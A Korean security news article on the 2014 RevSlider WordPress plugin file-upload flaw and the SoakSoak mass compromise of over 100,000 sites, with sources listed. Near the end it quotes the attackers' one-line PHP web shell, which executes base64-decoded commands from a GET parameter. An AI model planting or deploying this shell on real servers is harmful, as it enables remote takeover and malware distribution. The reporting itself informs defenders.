웹셀을 업로드할 수 있는 파일 업로드 취약점 발견
[보안뉴스 민세아] 워드프레스의 플러그인 형태로 설치되는 슬라이더 레볼루션(RevSlider)에서 웹셀을 업로드할 수 있는 파일 업로드 취약점이 발견됐으며, 이로 인해 100,000개의 사이트가 해킹에 영향을 받은 것으로 드러났다.
워드프레스는 블로깅과 웹 컨텐츠 관리(CMS)를 위해 주로 이용되는 소프트웨어이며, 슬라이드를 디자인하기 위해 사용하는 ‘슬라이더 레볼루션 플러그인’에서 파일 업로드 취약점(Slider Revolution shell upload exploit)이 발견됐다.
해당 취약점은 Simo Ben youssef에 의해 지난 2014년 10월 15일 발견됐다. 취약점이 발생하는 관리자 페이지에 접근할 때 별도의 인증이 없으며, 업로드 파일에 대한 검증이 부재해 발생하는 취약점이다.
공격자는 워드프레스가 설치된 취약한 웹사이트를 스캔한 후 웹셀 업로드를 통해 서버를 장악하고 악성코드 유포 등 추가적인 공격을 수행한 것으로 알려졌다.
보안업체 Securi는, 100,000개 이상의 워드프레스를 이용하는 사이트가 해당 공격에 노출되어 해킹됐다는 사실을 발표했다. 구글은 검색 결과 페이지에 SoakSoak.ru가 포함되어 있을 경우 Safe Browsing으로 검색 사이트로의 접근을 차단시키는 조치를 취하고 있다.
취약점을 통해 악성코드를 유포하는 최초 도메인 이름은 ‘SoakSoak.ru’이며, 공격자가 해킹에 사용한 웹셀 코드는 <?php system(base64_decode($_GET[‘cmd’])); ?>다.
이와 관련 보다 자세한 사항은 아래의 출처를 참고하거나 한국인터넷진흥원 인터넷침해대응센터 홈페이지를 참고하면 된다.
[출처]
1.http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522
2.http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html
3.https://www.centrora.com/blog/update-centrora-security-protect-soaksoak-malware/
[민세아 기자(boan5@boannews.com)]
<저작권자: 보안뉴스(http://www.boannews.com/) 무단전재-재배포금지>